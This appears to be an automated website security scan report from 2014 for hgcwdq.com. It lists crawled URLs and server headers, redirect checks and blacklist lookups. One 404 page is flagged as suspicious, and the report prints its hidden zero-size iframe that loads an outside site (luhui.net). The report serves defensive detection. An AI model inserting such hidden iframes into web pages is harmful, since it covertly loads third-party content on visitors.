Scanned pages/files
| Request | Server response | Status |
http://www.hgcwdq.com/ | HTTP/1.1 302 Object moved Cache-Control: private Date: Sun, 30 Mar 2014 22:57:19 GMT Location: 950 Server: Microsoft-IIS/6.0 Content-Length: 124 Content-Type: text/html Set-Cookie: ASPSESSIONIDSABARRDA=JCBAHOEAJOMIBLGJKKODKDJF; path=/ X-Powered-By: ASP.NET | clean |
http://www.hgcwdq.com/950 | HTTP/1.1 301 Moved Permanently Date: Sun, 30 Mar 2014 22:57:20 GMT Location: http://www.hgcwdq.com/950/ Server: Microsoft-IIS/6.0 Content-Length: 149 Content-Type: text/html X-Powered-By: ASP.NET | clean |
http://www.hgcwdq.com/950/ | 200 OK Content-Length: 8527 Content-Type: text/html | clean |
http://www.hgcwdq.com/950/about.asp?CasID=84&CabID=2 | 200 OK Content-Length: 13739 Content-Type: text/html | clean |
http://www.hgcwdq.com/950/product_xs.asp?PCaID=387&sid=387 | 200 OK Content-Length: 21845 Content-Type: text/html | clean |
http://www.hgcwdq.com/950/product_xs.asp?PCaID=388&sid=388 | 200 OK Content-Length: 20200 Content-Type: text/html | clean |
http://www.hgcwdq.com/950/product_xs.asp?PCaID=389&sid=389 | 200 OK Content-Length: 18474 Content-Type: text/html | clean |
http://www.hgcwdq.com/950/product_xs.asp?PCaID=390&sid=390 | 200 OK Content-Length: 15222 Content-Type: text/html | clean |
http://www.hgcwdq.com/950/product_xs.asp?PCaID=393&sid=393 | 200 OK Content-Length: 16847 Content-Type: text/html | clean |
http://www.hgcwdq.com/950/lookpro.asp?ProID=276&PCaID=393 | 200 OK Content-Length: 13313 Content-Type: text/html | clean |
http://www.hgcwdq.com/test404page.js | 404 Not Found Content-Length: 24795 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 0x0 src: http://www.luhui.net/index.html?404= <iframe allowtransparency=true border=0 align=center vspace=0 hspace=0 name=searchbar marginwidth=0 marginheight=0 framespacing=0 frameborder=0 scrolling=no width=0 height=0";url+=' src="http://www.luhui.net/index.html?404='+escape(yreflocation_html)+'"> | ||
http://www.luhui.net/cn/commerce/qq/qq.js | 200 OK Content-Length: 6349 Content-Type: application/x-javascript | clean |
http://www.luhui.net/intl/platform.asp?site=38466&user=38466 | 200 OK Content-Length: 10668 Content-Type: text/html | clean |
http://www.luhui.net/intl/ | HTTP/1.1 302 Moved Temporarily Cache-Control: private Connection: close Date: Sun, 30 Mar 2014 22:57:49 GMT Via: 1.1 supercdn:80 (squid/2.7.STABLE8) Location: ?q=luhui.net Server: Microsoft-IIS/6.0 Content-Length: 133 Content-Type: text/html Set-Cookie: ASPSESSIONIDCSBASQRC=IDLDGGKDGAAHKPCHMBFMFLDM; path=/ X-Cache: MISS from supercdn X-Cache-Lookup: MISS from supercdn:80 X-Powered-By: ASP.NET | clean |
http://www.luhui.net/intl/?q=luhui.net | 200 OK Content-Length: 14629 Content-Type: text/html | clean |
http://www.luhui.net/ie/stat.js?id=610720&web_id=610720 | 404 Not Found Content-Length: 24795 Content-Type: text/html | clean |
http://www.luhui.net/search/?Charset=gb2312&c=down&q=·Ö²¼Ê½ | 200 OK Content-Length: 12317 Content-Type: text/html | clean |
http://www.luhui.net/search/js/func.js | 200 OK Content-Length: 27162 Content-Type: application/x-javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: hgcwdq.com
Result:
GET / HTTP/1.1
Host: hgcwdq.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: hgcwdq.com
Referer: http://www.google.com/search?q=hgcwdq.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: hgcwdq.com
Referer: http://www.google.com/search?q=hgcwdq.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=hgcwdq.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://hgcwdq.com/
Result: hgcwdq.com is not infected or malware details are not published yet.
Result: hgcwdq.com is not infected or malware details are not published yet.